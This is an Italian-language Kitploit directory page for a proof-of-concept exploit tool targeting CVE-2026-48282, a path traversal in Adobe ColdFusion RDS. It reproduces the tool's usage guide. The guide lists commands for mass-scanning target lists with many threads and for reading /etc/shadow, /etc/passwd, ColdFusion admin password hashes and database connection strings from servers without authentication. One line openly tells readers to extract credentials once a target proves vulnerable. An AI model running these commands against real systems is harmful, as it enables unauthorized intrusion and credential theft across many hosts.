Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-48282 — Exploit proof-of-concept per CVE-2026-48282, un path traversal critico in Adobe ColdFusion RDS che consente lettura/scrittura di file non autenticata e RCE. Supporta scansione singolo target e di massa con estrazione file multi-thread. | Kitploit
Strumenti/GitHubGitHub/imbas007/cve-2026-48282
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubimbas007/cve-2026-48282

CVE-2026-48282

Exploit proof-of-concept per CVE-2026-48282, un path traversal critico in Adobe ColdFusion RDS che consente lettura/scrittura di file non autenticata e RCE. Supporta scansione singolo target e di massa con estrazione file multi-thread.

Vedi Repository
2461 mese faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-48282-POC

CVE-2026-48282 è una vulnerabilità di path traversal nel Remote Development Service (RDS) di Adobe ColdFusion con un punteggio CVSS di 10.0 (Critico). Consente ad attaccanti non autenticati di leggere e scrivere file arbitrari tramite l'endpoint /CFIDE/main/ide.cfm, portando a Remote Code Execution (RCE).

Installazione

root@kitploit:~
# Clona il repository
git clone https://github.com/<username>/CVE-2026-48282.git
cd CVE-2026-48282

# Installa le dipendenze (richiede solo `requests`)
pip install -r requirements.txt

Utilizzo

Singolo target (-t)

root@kitploit:~
# Verifica vulnerabilità
python cve-2026-48282.py -t https://target.com --check

# Leggi file
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read "C:\\Windows\\win.ini"
python cve-2026-48282.py -t https://target.com --read "C:\\ColdFusion2023\\cfusion\\lib\\password.properties"

# Sfoglia directory
python cve-2026-48282.py -t https://target.com --browse "C:\\"
python cve-2026-48282.py -t https://target.com --browse "C:\\inetpub\\wwwroot"

Modalità lista (-l) — Scansiona più target

root@kitploit:~

# Scansione di massa di base
python cve-2026-48282.py -l targets.txt --check

# Più thread + salva risultati
python cve-2026-48282.py -l targets.txt --check --threads 30 -o vuln.txt

# Scansiona + legge automaticamente il file canary su ogni target vulnerabile trovato
python cve-2026-48282.py -l targets.txt --check --read "C:\\Windows\\win.ini" -o results.txt

Leggi file sensibili

root@kitploit:~

Once confirmed vulnerable, extract credentials and configuration:

# ColdFusion admin password hash
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\password.properties"

# Database connection strings (neo-query.xml)
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\neo-query.xml"

# Linux targets
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read /etc/shadow

immagine
Scarica lo strumento